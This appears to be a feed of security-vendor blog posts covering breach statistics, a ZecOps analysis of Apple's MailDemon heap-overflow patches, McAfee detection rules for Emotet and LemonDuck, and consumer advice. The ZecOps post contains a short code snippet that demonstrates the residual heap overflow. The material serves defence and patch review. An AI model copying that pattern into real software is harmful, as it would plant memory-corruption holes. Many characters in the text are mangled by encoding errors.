  • Using tools like Veracode Security Labs for hands-on training, and IDE Scan for real-time feedback that helps developers learn as they code.

Learn more about thwarting cyberattacks by future-proofing your application security.

Verizon Data Breach Investigations Report Finds an Increase in Web Application Breaches

Verizon recently published its 2020 Data Breach Investigations Report (DBIR), which analyzed 32,002 security incidents in 16 different industries and four different world regions. Similar to last year???s findings, the majority of breaches ??? 86 percent ??? are financially motivated, and most ??? 70 percent ??? are caused by outsiders. Credential theft, social attacks (i.e., phishing and business email compromise), and errors are still causing the majority of breaches. As stated in the DBIR, ???These tactics prove effective for attackers, so they return to them time and again.???

Just as there are many similarities from last year???s DBIR, there are also many differences. An important change worth noting is that web applications were part of more than 43 percent of breaches, more than double the amount from last year. Stolen credentials were used in more than 80 percent of these incidents.

The DBIR found that the cause of the increase in web application breaches was a result of more people moving their workflows to the cloud. In light of the current pandemic, with more and more businesses undergoing digital transformations, the number of web application breaches will likely increase.

???As remote working surges in the face of the global pandemic, end-to-end security from the cloud to employee laptop becomes paramount," said Tami Erwin, CEO, Verizon Business.

Web application threats were found to be prevalent in all 16 industries, but especially in retail. The retail industry is seeing a major threat to their e-commerce applications ??? a trend that has carried over since 2019. It???s vital that retailers invest in a comprehensive application security (AppSec) program and scan their applications frequently.

Our recent State of Software Security (SOSS) report ツ?found that in the retail industry, 40 percent of applications are only scanned once a year. By increasing the number of scans, the retail industry could find and remediate more flaws and address security debt. Our analysis also found that there are two OWASP Top 10 vulnerabilities that should be on the retail industry???s radar: Code Injection and Credentials Management. Retail has a higher percentage of risks that fall into these categories. This is likely due to the fact that retailers need to authenticate users and handle input.ツ? Once again, more frequent scanning should help address these flaws.

To learn more about protecting web applications, check out our AppSec products and services.ツ?

Hidden demons? MailDemon Patch Analysis: iOS 13.4.5 Beta vs. iOS 13.5

Hidden demons? MailDemon Patch Analysis: iOS 13.4.5 Beta vs. iOS 13.5

Summary and TL;DR

Further to Apple’s patch of the MailDemon vulnerability (see our blog here), ZecOps Research Team has analyzed and compared the MailDemon patches of iOS 13.4.5 beta and iOS 13.5. 

Our analysis concluded  that the patches are different, and that iOS 13.4.5 beta patch was incomplete and could be still vulnerable under certain circumstances. 

Since the 13.4.5 beta patch was insufficient, Apple issued a complete patch utilising a different approach which fixed this issue completely on both iOS 13.5 and iOS 12.4.7 as a special security update for older devices. 

This may explain why it took about one month for a full patch to be released. 

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

iOS 13.4.5 beta patch

The following is the heap-overflow vulnerability patch on iOS 13.4.5 beta.  

The function  -[MFMutableData appendBytes:length:] raises an exception if  -[MFMutableData _mapMutableData] returns false.

In order to see when -[MFMutableData _mapMutableData] returns false, let’s take a look at how it is implemented:

When mmap fails it returns False, but still allocates a 8-bytes chunk and stores the pointer in self->bytes. This patch raises an exception before copying data into self->bytes, which solves the heap overflow issue partially.

 -[MFMutableData appendData:]
 |
 +--  -[MFMutableData appendBytes:length:] **<-patch**
    |
    +-- -[MFMutableData _mapMutableData]

The patch makes sure an exception will be raised inside -[MFMutableData appendBytes:length:]. However, there are other functions that call -[MFMutableData _mapMutableData] and interact with self->bytes which will be an 8-bytes chunk if mmap fails, these functions do not check if mmap fails or not since the patch only affects -[MFMutableData appendBytes:length:].

Following is an actual backtrace taken from MobileMail:

 * frame #0: 0x000000022a0fd018 MIME`-[MFMutableData _mapMutableData:]
    frame #1: 0x000000022a0fc2cc MIME`-[MFMutableData bytes] + 108
    frame #2: 0x000000022a0fc314 MIME`-[MFMutableData mutableBytes] + 52
    frame #3: 0x000000022a0f091c MIME`_MappedAllocatorAllocate + 76
    frame #4: 0x0000000218cd4e9c CoreFoundation`_CFRuntimeCreateInstance + 324
    frame #5: 0x0000000218cee5c4 CoreFoundation`__CFStringCreateImmutableFunnel3 + 1908
    frame #6: 0x0000000218ceeb04 CoreFoundation`CFStringCreateWithBytes + 44
    frame #7: 0x000000022a0eab94 MIME`_MFCreateStringWithBytes + 80
    frame #8: 0x000000022a0eb3a8 MIME`_filter_checkASCII + 84
    frame #9: 0x000000022a0ea7b4 MIME`MFCreateStringWithBytes + 136
-[MFMutableData mutableBytes]
|
+--  -[MFMutableData bytes]
   |
   +--  -[MFMutableData _mapMutableData:]

Since the bytes returned by mutableBytes is usually considered to be modifiable given following from Apple’s documentation:

This property is similar to, but different than the bytes property. The bytes property contains a pointer to a constant. You can use The bytes pointer to read the data managed by the data object, but you cannot modify that data. However, if the mutableBytes property contains a non-null pointer, this pointer points to mutable data. You can use the mutableBytes pointer to modify the data managed by the data object.

Apple’s documentation

Both -[MFMutableData mutableBytes] and -[MFMutableData bytes] returns self->bytes points to the 8-bytes chunk if mmap fails, which might lead to heap overflow under some circumstances.

The following is an example of how things could go wrong, the heap overflow still would happen even if it checks length before memcpy:

size_t length = 0x30000;
MFMutableData* mdata = [MFMutableData alloc];
data = malloc(length);
[mdata initWithBytesNoCopy:data length:length];    
size_t mdata_len = [mdata length];
char* mbytes = [mdata mutableBytes];//mbytes could be a 8-bytes chunk
size_t new_data_len = 90;
char* new_data = malloc(new_data_len);
if (new_data_len <= mdata_len) {
    memcpy(mbytes, new_data, new_data_len);//heap overflow if mmap fails
}

iOS 13.5 Patch

Following the iOS 13.5 patch, an exception is raised in “-[MFMutableData _mapMutableData] ”, right after mmap fails and it doesn’t return the 8-bytes chunk anymore. This approach fixes the issue completely.

Summary

iOS 13.5 patch is the correct way to patch the heap overflow vulnerability. It is important to double check security patches and verify that the patch is complete. 

At ZecOps we help developers to find security weaknesses, and validate if the issue was correctly solved automatically. If you would like to find similar vulnerabilities in your applications/programs, we are now adding additional users to our CrashOps SDK beta program
If you do not own an app, and would like to inspect your phone for suspicious activity – check out ZecOps iOS DFIR solution – Gluon.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

Realigning Priorities and Building a Bridge Between Security and Development

It???s a common conundrum for application security (AppSec) teams??ヲhow can developers and security professionals work together to release software faster? It takes a working relationship, good communication, and the right tools, which most teams don???t have.

Even more discouraging, stigmas follow both teams around the office; developers often worry that security is there to slow down or halt their projects while security is concerned that developers aren???t prioritizing secure code. As modern software development becomes faster with tighter deadlines and an array of cyberthreats awaiting vulnerable code, there???s little room for misalignment.

It???s a multifaceted issue that should be understood from both angles. Misaligned business priorities and processes can create an array of problems, from a lack of innovation for fear of increased risk to unforeseen vulnerabilities falling through the cracks during the development process. And when developers aren???t empowered to improve their skills with educational tools like Security Labs, there???s less of a chance that they???ll feel prepared or appreciated when security comes knocking.

To begin addressing these concerns, changes must come from the top-down, trickling through each team to impact their goals and methods for an overall healthier AppSec program. When they have direction, developers and security leaders can find a common ground by building a working relationship that benefits both teams (and ultimately, the entire organization). Three key steps to fixing the misalignment between security and development include:

  1. Shifting to a security-focused mindset across the business.
  2. Implementing a security champions program to encourage developer participation.
  3. Making it easier for the development team to write secure code.

Once security leaders understand the tools and methodologies developers are most comfortable with, and developers have the opportunity to learn more about security practices, closing the gap between these two otherwise siloed teams isn???t as daunting. With the right tools, processes, and communication methods in place, security and development will have an easier time falling into the right working cadence to produce more secure applications. ツ?

Watch our video "Tips for Unifying the Security Professional and Developer Roles" below to hear from Veracode???s Chief Technical Officer Chris Wysopal and Chief Product Officer Ian McLeod on how these roles became misaligned, and how organizations can tackle the problem head-on.

My Flight Path: From the Royal Air Force to McAfee

By: Gareth, Technical Support Engineer, UK

Where do you see yourself in five years? This well-known question is the crux of any career planning. Your answer may take self-reflection with twists and turns or it may be a more obvious, straightforward path. My answer was the latter—or so I thought.

Just last year, my answer was serving in the Royal Air Force (RAF). But here I am, at McAfee as a veteran through McAfee’s Return to Workplace program. I’m thankful my career took a few twists.

Change in Flight Path

For nearly two decades, serving in the RAF was all I knew. I carried out ceremonial duties in the Queen’s Colour Squadron, deployed airfield communication systems and served as an instructor for several certification courses. The RAF was my second home. I imagined my career beginning and ending with a commitment to serve and protect.

Last year, my career veered left. After a severe injury, I was medically discharged. The surgery and rehabilitation proved a challenge, but the loss of what felt like my lifelong purpose was another shock to my system that took time to accept.

In a way, I felt prepared. Flight paths change. I refocused this as an unexpected opportunity to reinvent myself in the civilian world.

Finding Flight Instructions

I asked myself the infamous question, “Where do you see yourself in five years?” I landed in the technology sector as a logical next step, given my background. My answer didn’t include belonging—I doubted I would find a sense of purpose the RAF offered.

All too quickly, I learned military certifications don’t hold much value to corporations. Prospective employers informed me I didn’t have the right education or the right experience.

I needed flying instructions to support my entry into seemingly foreign territory.

I stood on the edge of defeat when I stumbled upon McAfee’s Return to Workplace program—for veterans! This 12-week program would provide classroom and on-the-job training I could add to my resume. Here were my flying instructions.

A New Squadron at McAfee

My fingers couldn’t click apply fast enough. I was the first veteran accepted into the program. Though newly established, my experience was second to none. The stand-out training and customer work rebuilt my confidence.

I even found belonging and purpose. The team environment is not unlike the military. Team members willingly supported me in solving problems or directing me to someone who could help. Although how I protect my family, community and government looks different from military to McAfee, my purpose remains.

I’m thrilled to continue my work with McAfee after the 12-week period. I plan to support other veterans through McAfee’s Return to Workplace program. Even though I’m qualified and capable, my difficulty in finding civilian work is not a unique experience for veterans. I’m hopeful I can make a difference for veterans looking to reenter civilian life and help others realize the value veteran experience offers.

I’m confident I now have the skills needed for takeoff and where do I see myself in five years? At McAfee.

Join a company that values all experiences. Search our openings.

The post My Flight Path: From the Royal Air Force to McAfee appeared first on McAfee Blogs.

Understanding How Bitcoin Mining Poses Security Risks

Working from home

The value of Bitcoin has had its ups and downs over the past several years, but continues to attract interest in the midst of a chaotic market. The rapid growth of this alternate currency has dominated headlines and ignited a cryptocurrency boom that left consumers everywhere wondering how to get a slice of the Bitcoin pie. For those that want to join the craze without trading traditional currencies like U.S. dollars, a process called “Bitcoin mining” appears to be a great way to get involved. However, Bitcoin mining introduces a number of security risks.

What is Bitcoin mining?

Mining for Bitcoin is like mining for gold—you put in the work and you get your reward. But instead of back-breaking labor, you earn the currency with your time and computer processing power. “Miners”, as they are called, essentially upkeep and help secure Bitcoin’s decentralized accounting system.

Each time there’s a transaction it’s recorded in a digital ledger called the “blockchain.” Miners help to update the ledger by downloading a special piece of software that allows them to verify and collect new transactions to be added to the blockchain. Then, they must solve a mathematical puzzle to be able to add a block of transactions to the chain. In return, they earn Bitcoins, as well as transaction fees.

What are the security risks?

As the digital currency has matured, Bitcoin mining has become more challenging. In the beginning a user could mine on their home computer and earn a good amount of the digital currency, but these days the math problems have become so complicated that it requires a lot of expensive computing power.

This is where the risks come in. Since miners need an increasing amount of computer power to earn Bitcoin, some have started compromising public Wi-Fi networks so they can access users’ devices to mine for Bitcoin.  Such an event happened at a coffee shop in Buenos Aires, which was infected with malware that caused a 10-second delay when logging in to the cafe’s Wi-Fi network. The malware authors were using this time to access the users’ laptops for mining.

In addition to public Wi-Fi networks, millions of websites are being compromised to access users’ devices for mining. In fact, this has become such a widespread problem, that over 1 billion devices are believed to be slowed down by web-based mining. And slowing your device down is not even the worst thing that could happen. A device that is “cryptojacked” could have 100 percent of its resources used for mining, causing the device to overheat, essentially destroying it.

Now that you know a little about Bitcoin mining and the risks associated with it, here are some tips to keep your devices safe as you monitor the cryptocurrency market:

  • Avoid public Wi-Fi networks—These networks often aren’t secured, opening your device and information up to a number of threats.
  • Use a VPN— If you’re away from your secure home or work network, consider using a virtual private network (VPN). This is a piece of software that gives you a secure connection to the Internet, so that third parties cannot intercept or read your data. A product like McAfee Safe Connect can help safeguard your online privacy no matter where you go.
  • Secure Your Devices—New threats like Bitcoin malware are emerging all of the time. Protect your devices and information with comprehensive security software, and keep informed on the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post Understanding How Bitcoin Mining Poses Security Risks appeared first on McAfee Blogs.

What is disk cleanup and does it remove viruses?

What is Disk Cleanup and does it remove viruses?

It happens. You’re in the middle of a computing task, and your screen blinks. The blue screen (Stop Error) is shown with the message that your PC ran into an error and needs to restart. These hiccups occur when your computer’s software, firmware, or drivers crash due to faulty or incompatible hardware or software.

If you’re like most people, you want a computer that’s nimble enough to keep up with your life. When your computer is bogged down with outdated files, you aren’t able to work at an efficient pace.

While a new computer or external drive may give you more file storage space, there’s a faster way to gain usable storage space without straining your budget. This option is called disk cleanup, and all Windows computers come with a version of it that you can use to reclaim hard disk space gratis. Here are some things that you need to know about Microsoft’s disk cleanup tool.

What is Disk Cleanup?

Disk cleanup is a maintenance utility that was developed by Microsoft for its Windows operating system. The utility scans your computer’s hard drive for files that you no longer need such as temporary files, cached webpages, and rejected items that end up in your system’s Recycle Bin. Unless you remove those files, they add up over time and begin taking a lot of space on your computer.

The utility displays the identified files and the amount of storage space that each of them uses within your hard drive. You decide which items to delete by the importance that you place on the files and the amount of hard drive space that you’ll be able to recover. In Windows 10, you can reach this utility by going to your start menu and scrolling to Windows Administrative Tools to click the disk cleanup button.

Windows also has the feature Quick Clean which lets you clean up the junk temporary files from your Windows desktop safely and quickly. It also cleans additional junk files, which the Disk Cleanup Utility does not.

What are System updates?

System updates such as major OS releases, monthly patches and emergency updates have become standard for today’s computers. Most operating systems are set to download the latest updates automatically. However, on Windows devices, the previous version of an operating system isn’t always deleted when the latest version replaces it. After years of updates, you’ll often have several versions of the OS on your computer.

The disk cleanup utility allows you to remove backup shadow copies from your computer. Programs that you download to open or edit a document take up storage space on your computer’s hard drive long after you’ve completed your project. Disk cleanup allows you to locate those programs, see how much storage space they use, and remove them to free up hard disk space. You’ll find these features by selecting the “more options” tab within the disk cleanup menu.

What is Storage Sense?

Microsoft Windows 10 comes with an upgraded disk cleanup function that’s called Storage Sense. With Storage Sense, you can set your system to automatically clean up unwanted files by setting the tab to the “on” position. You choose to allow Storage Sense to remove temporary files that your programs no longer use, files in the Download folder that haven’t changed in 30 days, and files that have been sitting in your Recycle Bin for over 30 days. You can reach Storage Sense by going to the Settings menu, clicking on the Systems button, and selecting the Storage option.

What Are the Benefits of Disk Cleanup?

While you can search for temporary files yourself and delete them manually, you save time by using the Windows disk cleanup tool. You can search your entire hard disk for specific files within a matter of seconds with the disk cleanup utility. The tool also gives you greater control over which files to delete and those to keep. When outdated application files are removed from your system, it runs more smoothly and has fewer crashes.

Does Disk Cleanup Remove Viruses?

One of the most common ways that viruses enter computer systems is through downloads. A user lands on an untrusted website and clicks on a button to get a free download. The download contains a virus that goes undetected. If the application remains untouched for longer than 30 days, you can run the disk cleanup utility to find the offending download and remove it quickly. While you shouldn’t use disk cleanup as a replacement for a robust antivirus product, the tool can work in conjunction with a trusted antivirus solution to better safeguard your computer’s system, files, and data.

The Wrap Up

Whether you use your computer to work from home or to manage your household, you’ll want it to function as it should. This includes the flexibility to download a program for a short-term project or quickly process spreadsheets to share with coworkers on an online portal. These operations are greatly impaired when your hard disk is full of unnecessary files and bloatware. Using the Windows disk cleanup tool allows you to remove these files that could contain malware and increase the capacity and safety of your computing environment.

The post What is disk cleanup and does it remove viruses? appeared first on McAfee Blogs.

My email has been hacked! What should I do next?

chat etiquette

Signs Your Email Was Hacked

With the advent of #Staysafe and #Shelterinplace, the increase of personal email com-munication has skyrocketed. This increase has allowed clever hackers to worm their way into installing viruses via attachments as well as other common techniques.

You Know You’ve Been Hacked When…

Your Contacts are Receiving Messages Not Sent By You

Messages that seem to come from you to friends or business contacts must alert you to a severe problem on your computer. Friends may have the confidence to let you know about these emails, but business contacts or professional associates may not. Hackers can install malware on their computers through email attachments, and the intruder can find a password with an amazingly small amount of effort.

Your Online Password Stops Working

As a regular visitor to your favorite sites, you know the password that each one requires. While you may accidentally strike a wrong key and create a typo, the chances of doing it twice seem highly unlikely. Since you know that the password appears not to work, you may need to consider the possibility that someone has hacked your email.

Once inside your computer, hackers have almost a free reign to look for your pass-words. Many people create a list of passwords for convenience, but the benefit to a hacker who finds such a file can reach significant proportions.

Slow and Erratic Computer Performance

Unpredictable conduct by your computer can mean that a virus may have infected it. The sluggishness that replaces the usual prompt response that you expect tells you that you have a problem. Spyware, a malicious type of software, can track your online activity, tamper with your files, and even steal your private information.

When you consider the burden that spyware can place on your system, you can under-stand the reason for its lackluster speed. While you probably did not notice anything wrong when you downloaded a picture from a website or clicked on an attachment in an email, a virus could have accompanied it. Until you remove the virus, you may feel as though you have someone watching you, and you do.

Watching for Ransomware

A particularly insidious form of malicious software comes with an ability to make you pay for the privilege of controlling your computer. Ransomware can enter your system through emails, and you allow it to do so when you click on an attractive attachment from an unknown sender. Ransomware can lock your files and make them inaccessible. The troublemakers who put it there demand a fee to release its grip on your system.

Maybe more dangerous than other malicious invasions of your computer, ransomware carries a penalty that can completely deny you access to your files and cost you money to get it back. As a caution that reminds you of the hazard of opening attachments that can cause damage to your computer and your finances, an email that installs ransom-ware deserves attention immediately.

What Should I Do if My Email is Hacked?

Change your password

This is the first thing you must do to ensure that the hacker can’t get back into your ac-count. Your new password must be complex and unrelated to previous passwords. Al-ways use 8-10 characters with a mix of upper and lower case characters as well as numbers and symbols.

Reach out to your email contacts immediately

A big part of the hacker’s strategy is to ‘get their claws’ into your address book to hook others as well. Send a message to all of your email contacts as soon as possible. Let them know they should avoid opening any emails (most likely loaded with malware) that have come from you.

Change your security question

If you have security questions associated with your email account, be sure to change them too. Make them unpredictable and niche.

Enable Multi-Factor Authentication

Yes, multi-factor authentication adds another step to your login, but it also adds another layer of protection. Enabling this will mean that in addition to your password, you will need a unique one-time use code to log in. This is usually sent to your mobile phone.

Scan your computer for malware and viruses

This is an essential step. Comprehensive security software will provide you with a digital shield for your online life. McAfee Total Protection lets you protect all your devices – including your smartphone – from viruses and malware. It also contains a password manager to help you remember and generate unique passwords for all your accounts.

Change any other accounts with the same password

This is time-consuming but a worthwhile effort. Ensure that you change any other ac-counts that use the same username and password as your compromised email. Hackers love when we use the same logins for multiple accounts.

Stay protected

While email can pose potential security risks, antivirus software protects your computer system from potential damage. Programs that run efficiently in the background detect and eliminate threats. Awareness and preparedness can help you thwart attempts to hack private information and let you maintain a secure environment online.

The post My email has been hacked! What should I do next? appeared first on McAfee Blogs.

How To Use McAfee ATP to Protect Against Emotet, LemonDuck and PowerMiner

Introduction

This blog describes how McAfee ATP (Adaptive Threat Protection) rules are used within McAfee Endpoint Security products. It will help you understand how ATP Rules work and how you can utilize them to prevent infections from prevalent malware families such as Emotet, LemonDuck and PowerMiner. Please read through the recommendation section to effectively utilize rules in your environment.

ATP rules are a form of Attack Surface reduction technology which detects suspicious use of OS features and applications. These rules target behaviors which are often abused by malware authors. There can be cases where legitimate applications utilize the same behavior and hence rules need to be configured based on the environment.

ATP rules within McAfee Endpoint Security (ENS) 10.5.3 and above have already detected over a million pieces of malware since the start of 2020. This blog will show you how to enable ATP rules and explains why they should be enabled by highlighting some of the malware we detect with them. We’ll also show you how to maximize detection capabilities by tweaking some specific settings.

First, let’s start with an overview. We release ATP rules in three types: Evaluate, DefaultOn and HighOn.

Evaluate rules are tested in the field by McAfee to determine if they are robust enough to detect malicious activity while not producing false positives. Once a rule has been in evaluate mode for a period of time, McAfee researchers will analyze its performance and either make modifications or promote it to DefaultOn or HighOn. ENS ATP customers connected to McAfee ePolicy Orchestrator (ePO) can manually change Evaluate rules to Enabled mode.

DefaultOn rules are created when McAfee has high confidence that no legitimate applications will be impacted. These rules are then enabled by default in all McAfee Endpoint Security rule groups.

HighOn rules detect behavior that is known to be malicious but may have some overlap with non-malicious applications. These rules are set to Observe mode for systems in the “Balanced” rule group, but act as DefaultOn for systems in the “Security” rule group. Later in this blog, we cover how to change the rule group in Endpoint Security products to enable HighOn rules.

How to enable ATP rules in ENS 10.5.3 and above

By default, many ATP rules are set to Observe mode. To enable these rules in an active-blocking mode, login to the ePO Console and go to Menu->Configuration->Server Settings.

 

Figure 1. Rules in the Balanced rule group.

Select Adaptive Threat Protection and select the required rule group (Productivity, Balanced, or Security).

As seen in Figure 1, Rule 329 is in Observe mode in the Balanced rule group and, in Figure 2 below, you can see it is Enabled by default in Security rule group.

Note: As mentioned previously, we analyze rules from time to time and make modifications so you may have different settings in your environment, depending upon the content version.

 

Figure 2. Rules in Security rule group.

To enable a rule click on Edit below the rules and Select the rule you would like to change, then select the desired state – Disabled, Enabled, or Observe. Figure 3. shows how we can change the state of Rule 256 which helps in detecting Emotet and Trickbot downloaders.

 

Figure 3. Changing the Rule State.

Click on Save and the rule should be enabled on the clients within a few minutes. Here you see that Rule 256 blocks malicious file JTI/Suspect.131328 by default.

Figure 4. Evaluate Rule blocking after Enabling.

Change the assigned rule group to use HighOn rules in ENS 10.5.3 and above

In this section, we will step through how you can change the rule group to “Security” which will enable all the HighOn rules in block mode by default. We recommend you check the logs to see if the HighOn rules have detected clean activity within your environments before changing to this rule group.

To change the rule group, login to the ePO console and go to Menu->Systems->System Tree

Figure 5. Selecting the group of systems to modify Policies for ENS.

Select a group and go to the Assigned Policies tab. Select ‘Endpoint Security Adaptive Threat Protection’ from the product dropdown.

Figure 6. Selecting policies to modify the assigned rule group.

Click on ‘My Default’ policy under the ‘Options’ category.

 

Figure 7. Changing the rule group to Security.

Scroll down to Rule Assignment. From the Rule Assignment drop-down list, select Security and click Save. This will update all the clients with ‘My Default’ policy to the Security rule group.

Enable HighOn rules in MVISION Endpoint  

To enable HighOn rules, MVISION Endpoint policy needs to be set to ‘High Protection’ if it is not already set by default. Follow these steps:

Login to the ePO console and go to Menu->Systems->System Tree

Figure 8. Selecting the group of systems to modify policies for MVISION Endpoint

Select a group and go to the Assigned Policies tab. Select ‘MVISION Endpoint’ from the product dropdown.

Figure 9. Selecting the policies to change the Protection mode.

Click on ‘Edit Assignment’ under General Category.

Figure 10. Changing MVISION Endpoint to High Protection.

Change ‘Inherit from’ to ‘Break Inheritance and assign the policy and settings below’. Also, change the ‘Assigned policy’ to ‘High Protection’ from the dropdown list and click on ‘Save’. This will enable all the HighOn rules.

ATP Rules in the Wild

This section highlights three prevalent threats which ATP rules detect. We highlight one rule for each DefaultOn/HighOn/Evaluate to demonstrate the importance of monitoring rule updates and enabling more aggressive rules if they are suitable for your environment.

PowerMiner (DefaultOn example)

The PowerMiner malware is a cryptocurrency malware that has been prevalent since 2019. We have discussed this malware before in a previous blog on AMSI detection. The purpose of PowerMiner is to infect as many machines as possible to mine Monero currency. The initial infection vector is via phishing emails which contain a batch file. Once run, this batch file will execute a malicious PowerShell script that will then begin the infection process.

ATP DefaultOn Rule 263 “Detect processes accessing suspicious URLs” and Rule 262 “Identify suspicious command parameter execution for Security rule group assignments” blocks this threat once PowerShell is executed by the Dropper.bat and it attempts to download the malicious PS1 file.

This is shown by the red cross in the flow chart above. As mentioned in the AMSI blog, this threat is also covered by our AMSI signatures but as we do with several threats, we have different forms of detection in case the malware authors modify their code to attempt to bypass one of them.

The IP Map below shows the detections of this threat between October 2019 and January 2020 by the ATP Rules mentioned above.

LemonDuck (HighOn example)

LemonDuck, like PowerMiner, is a coin mining malware. It spreads via various methods such as the Eternal Blue exploit and Mimikatz. Once a machine has been infected, LemonDuck will create several scheduled tasks to download various components which include the coin mining functionality. The flow chart below shows the Lemon Duck infection process:

 

ATP HighOn rule 329 “Identify and block suspicious usage of Scheduled Tasks in high change systems” blocks LemonDuck at the schedule task creation stage. Again, like PowerMiner, McAfee also has an AMSI signature which detects this threat as LemonDuck!<partial_hash>.

The IP Map below shows the detections of this threat between October 2019 and January 2020 by the ATP Rule mentioned above.

Emotet Downloader (Evaluate example)

Emotet is a Trojan which is responsible for downloading and executing several high-profile malwares including Trickbot, which is turn has been known to download and execute the Ryuk ransomware. Emotet is usually downloaded and executed on the victim’s machine by malicious documents which are sent out via email spam. The malicious document will use PowerShell to download the Emotet executable and execute it. The flow is shown below:

 

McAfee ATP rule 256 ‘Detect use of long -encoded command PowerShell’ and rule 264 ‘Inspect EncodedCommand Powershell’ will detect this behavior if enabled. This is not enabled by default as this behavior can be legitimate, so we recommend checking the detections in Evaluate mode and, if no false positives occur, then turning it on. This rule will also block other malware which performs the same activity as Trickbot. The IP Map below shows the detections Rule 256 has had between October 2019 and January 2020. This will include all threats detected by this rule, not just Emotet.

Recommendations

By now you are likely asking yourself which rules you should turn on. Firstly, it should be noted that enabling ATP Rules will have no performance impact however, as highlighted in the first section, they can sometimes cause false positives.

From the collection of ATP rules, we recommend turning on the ‘Observe’ mode rules mentioned in this blog.

In addition to the rules mentioned for each threat, the following rules can be turned to ‘Enabled’ mode from the EPO console as we described. As mentioned, there is continuous evaluation of these rules by McAfee researchers which can result in rules moving to a different rule group or merging into other existing rules.

  • Rule 238– Identify abuse of common processes spawned from non-standard locations.
  • Protection from files being executed from suspicious locations which are often used by attackers.
  • Rule 309 – Block processes attempting to launch from Office applications.
    • Office documents are the main vectors used to deploy malware. This rule prevents Office applications from being abused to deliver malicious payloads.
  • Rule 312 – Prevent email applications, such as Outlook, from spawning script editors and dual use tool
    • Spam emails are common initial attack vectors being utilized by malware authors. This rule will help to detect suspicious use of email applications by preventing the launch of uncommon processes.
  • Rule 323 – Prevent mshta from being launched as a child process.
    • Related to MITRE technique T1170. Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to execute malicious .hta files and JavaScript or VBScript. This rule will help to detect the malicious use cases. You can read more about mshta here.

In general, we recommend looking through your ATP logs and checking to see if any ‘Observe’ mode rules are causing detections. If you find any rules that are not detecting legitimate use cases, we advise changing them to ‘Enabled’ mode.

We advise using ePO groups for a small number of machines and then monitor the changed environment for any false positives. If there are no false positives, you can then deploy the changes to a broader group.

KB Article KB82925 shows all the available ATP rules. You can also refer to the ATP Rules Release Notes which are updated when new rules are created, or existing ones are modified.

Conclusion

We hope that this blog has helped highlight how ATP rules protect your environment against a variety of threats and, by combining this technology with others like AMSI, we reinforce protection.

This blog continues a series which help showcase our technology, so we also recommend reading the following:

McAfee Protects against suspicious email attachments

McAfee AMSI integration protects against malicious scripts

Using Expert Rules in ENS to prevent malicious exploits

What Is Mshta, How Can It Be Used and How to Protect Against It

 

All testing was performed with the JTI Content Version 1134 and MVISION Endpoint Version 20.1.0.114 (in High Protection)

The post How To Use McAfee ATP to Protect Against Emotet, LemonDuck and PowerMiner appeared first on McAfee Blogs.

Protect Yourself Against Phishing Scams With These Security Tips

Making Media #FromHome

Phishing is one of the oldest cyberthreats in the book, and yet still one of the most effective. As people across the globe find themselves taking to the internet more than ever before, criminals see this as an opportunity to release phishing attacks on unsuspecting users. In fact, Security Boulevard found a 600% rise in phishing campaigns in the last month. So, as users leverage the World Wide Web to stay connected with friends and loved ones, it’s imperative that they remain wary of scammers looking to exploit our need to virtually communicate. With that, let’s take a look at why phishing is so effective even in 2020 and explore what actions users can take to stay protected. 

What is Phishing?

Phishing attacks occur when scammers attempt to trick users out of money or personal information, usually by email, phone, or text. With so many avenues for criminals to hook victims, phishing is one of the most prevalent threats we see today. As part of their phishing schemes, scammers often use something called social engineering to manipulate users into trusting them for fraudulent purposes, often by pretending to be a legitimate person or business. Through these phishing attacks, criminals can spread malware and other malicious content.  

The Evolution of Phishing

As new technology and circumstances arise, scammers find new ways to evolve the age-old technique of phishing. What originated as email and instant messages attempting to steal users’ credentials has since taken on new forms like SMiShing or adapted its content to hook the victim with a shocking subject line. 

Why has this technique continued to plague users since its inception? Hackernoon argues that it’s because phishing doesn’t require in-depth networking knowledge or even basic programming skills. It simply relies on human error and the lack of online security awareness, manipulating human psychology just as much as technological tools.  

Phishing Capitalizes on Emotion

Let’s face it – we’re all human. Our inherent psychology makes us quick to act on emotion. However, this is much of the reason why phishing has forged on as a favorite among hackers. Unfortunately, criminals tend to capitalize on bad or shocking news to grasp the victim’s attention, leading them to click on malicious links or give up personal data all too eagerly. Take today’s environment, for example. As businesses are faced with budget cuts and organizational restructuring, many users might be uncertain about their job security – an opportunity that scammers are eager to exploit. In fact, some organizations have recently observed phishing emails with subject lines reading “HR Termination List.” Through these malicious attempts, fraudsters use fear tactics to tempt recipients into clicking on links in emails or downloading dangerous content.  

With millions of users suddenly out of work, a lot of people have found themselves desperately looking for new job opportunities or seeking financial help. However, users should not let their guard down while job hunting, as this could prevent them from noticing the tell-tale signs of phishing. According to The Motley Fool, some phishing emails and text messages claim to offer work-from-home job opportunities, information about health insurance or Medicare, or loans or other forms of financial reliefIn fact, the Federal Communications Commission (FCC) reported that many Americans have received texts from the “FCC Financial Care Center” offering $30,000 in relief for those who have recently been laid off or furloughed. While this might appear to be a saving grace, it’s a stealthy demise to trick users into giving up their credentials.  

Act Now to Stay Protected

So, whether you’re working from homeparticipating in distance learning to complete college courses, or video chatting with loved ones, there will always be fraudsters looking to exploit your online activity. However, there are proactive measures you can take to help ensure your security. First and foremost is using comprehensive security softwareIf you’ve never been targeted by a phishing scam, it might be difficult to envision the benefit of installing a security solution. You might even be convinced that if you haven’t been targeted yet, then you won’t be in the future. However, there’s no off-season when it comes to security. As fraudsters continue to evolve their techniques, employing the help of security software will act as an added safety net in the event that a phishing email appears in your inbox.  

Aside from using comprehensive security software, here are some other tips to help protect your online security.  

Go directly to the source

Be skeptical of emails or text messages claiming to be from organizations with peculiar asks or with information that seems too good to be true. Instead of clicking on a link within the email or text, it’s best to go straight to the organization’s website or contact customer service. 

Be cautious of emails asking you to act

If you receive an email or text asking you to take a certain action or download software, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links. 

Hover over links to see and verify the URL

If someone sends you a message with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the message altogether. 

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Protect Yourself Against Phishing Scams With These Security Tips appeared first on McAfee Blogs.

